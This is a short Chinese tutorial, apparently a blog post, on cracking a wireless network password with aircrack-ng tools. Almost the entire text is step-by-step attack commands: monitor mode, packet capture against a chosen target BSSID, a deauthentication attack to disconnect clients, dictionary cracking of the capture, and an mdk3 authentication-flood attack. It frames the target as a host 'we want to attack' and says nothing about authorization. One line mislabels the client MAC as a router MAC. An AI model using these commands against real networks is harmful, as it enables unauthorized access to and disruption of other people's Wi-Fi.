输入airmon-ng wlan0 up加载无线网卡;
之后输入airmon-ng start wlan0激活网卡到监听模式monitor
airmon-ng start wlan0 n 加隧道 可选
airodump-ng mon0进行探测我们要攻击的目标主机
//指定隧道扫描
继续输入airodump-ng --ivs -w abc -c 6 mon0 开始抓包!
--ivs是通过ivs过滤,只保留可以破解密码的报文.ivs文件,
这样比较快点;-w是将抓取的报文写入命名为abc并保存
(之后会在当前文件夹保存为abc-01.ivs);-c后面跟频道,如这里的6 。 、
//自定mac扫描
root@kali:~# airodump-ng --ivs -w wifi-pass --bssid 1C:60:DE:77:B9:C0 -c 1 wlan0mon
然后新开一个终端窗口,对目标主机进行deauth攻击,以加速抓包!
命令格式aireplay-ng -0 大小 -a 目标主机mac -c 客户端 mac mon0
本例中的为
aireplay-ng -0 10 -a mac地址 -c 路由mac地址 wlan0mon
接下来最好还是再开一个终端窗口,输入aircrack-ng abc-01.ivs -w /root/pass.text,
然后输入要破解的无线网络序号开始破解密码!
特例:
可以使用mdk3工具对目标进行洪水验证攻击,效果不错:
mdk3 mon0 a -a 目标主机mac
关闭监听
airmon-ng stop wlan0mon
网友评论